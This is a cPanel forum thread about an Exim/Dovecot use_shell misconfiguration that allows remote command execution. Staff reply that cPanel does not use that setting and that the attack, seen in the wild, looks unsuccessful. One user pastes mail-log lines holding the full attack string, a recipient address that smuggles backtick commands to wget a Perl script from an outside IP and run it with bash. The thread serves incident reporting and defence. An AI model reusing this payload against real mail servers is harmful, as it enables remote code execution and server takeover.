The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

Discussion in 'E-mail Discussions' started by Domenico, May 5, 2013.

  1. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    362
    Likes Received:
    0
    Trophy Points:
    16
    #1 Domenico, May 5, 2013
    Last edited: May 5, 2013
  2. cPanelNick

    cPanelNick Administrator
    Staff Member

    Joined:
    Mar 9, 2015
    Messages:
    3,426
    Likes Received:
    2
    Trophy Points:
    38
    cPanel Access Level:
    DataCenter Provider
    We don't use use_shell in exim.conf. The deficiencies of use_shell are already documented in the exim documentation showing this is a security problem when used this way. This is a case of blindly copying the example and not reading the docs that go along with it. It looks like the exim devs has since made the warning stronger and more fiercely worded.
     
  3. zye

    zye Well-Known Member

    Joined:
    Dec 6, 2002
    Messages:
    96
    Likes Received:
    1
    Trophy Points:
    8
    i noticed
    <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com>

    exim_mainlog

    Code:
    2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 08:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 14:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 23:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 08:39:39 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 17:39:33 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 01:40:27 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 10:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (111): Connection refused
    
    exim_mainlog:2013-05-05 04:39:03 1UYgRb-0003y5-7t example.com [2001:500:88:200::10] Network is unreachable
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t example.com [192.0.43.10] Connection timed out
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.co
     
  4. cPanelNick

    cPanelNick Administrator
    Staff Member

    Joined:
    Mar 9, 2015
    Messages:
    3,426
    Likes Received:
    2
    Trophy Points:
    38
    cPanel Access Level:
    DataCenter Provider
    Looks like its out in the wild now. From the old it looks quite unsuccessful.
     
Loading...

Share This Page